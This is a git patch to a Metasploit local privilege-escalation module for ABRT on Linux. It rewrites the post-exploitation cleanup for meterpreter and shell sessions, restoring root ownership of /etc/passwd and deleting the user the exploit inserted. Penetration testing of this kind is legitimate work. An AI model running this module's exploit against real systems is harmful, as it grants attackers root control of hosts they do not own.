From e158ccb20b6b9afcff69023775757964f184cadd Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sun, 4 Feb 2018 04:38:53 +0000
Subject: [PATCH] Support cleanup for meterpreter sessions

---
 .../linux/local/abrt_raceabrt_priv_esc.rb     | 65 ++++++++++++++++---
 1 file changed, 57 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb b/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
index 018e107944..1670dad9d1 100644
--- a/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
+++ b/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
@@ -174,16 +174,65 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def on_new_session(session)
-    # Reinstate /etc/passwd ownership
-    session.shell_command_token "chown root:root #{@chown_file}"
-
-    # Remove new user
-    session.shell_command_token "sed -i 's/^#{@username}.*$//g' #{@chown_file}"
-    passwd = session.shell_command_token "grep #{@username} #{@chown_file}"
-    if passwd.include? @username
-      print_warning "Could not remove user '#{@username}' from #{@chown_file}"
+    if session.type.to_s.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
     end
 
+    # Reinstate /etc/passwd root ownership and remove new user
+    root_owns_passwd = false
+    new_user_removed = false
+
+    if session.type.to_s.eql? 'meterpreter'
+      # Reinstate /etc/passwd root ownership
+      session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\""
+
+      # Remove new user
+      session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\""
+
+      # Wait for clean up
+      Rex.sleep 5
+
+      # Check root ownership
+      passwd_stat = session.fs.file.stat(@chown_file).stathash
+      if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0
+        root_owns_passwd = true
+      end
+
+      # Check for new user in /etc/passwd
+      passwd_contents = session.fs.file.open(@chown_file).read.to_s
+      unless passwd_contents.include? "#{@username}:"
+        new_user_removed = true
+      end
+    elsif session.type.to_s.eql? 'shell'
+      # Reinstate /etc/passwd root ownership
+      session.shell_command_token "chown root:root #{@chown_file}"
+
+      # Remove new user
+      session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}"
+
+      # Check root ownership
+      passwd_owner = session.shell_command_token "ls -l #{@chown_file}"
+      if passwd_owner.to_s.include? 'root'
+        root_owns_passwd = true
+      end
+
+      # Check for new user in /etc/passwd
+      passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}"
+      unless passwd_user.to_s.include? "#{@username}:"
+        new_user_removed = true
+      end
+    end
+
+    unless root_owns_passwd
+      print_warning "Could not reinstate root ownership of #{@chown_file}"
+    end
+
+    unless new_user_removed
+      print_warning "Could not remove user '#{@username}' from #{@chown_file}"
+    end
+  rescue => e
+    print_error "Error during cleanup: #{e.message}"
+  ensure
     super
   end
 end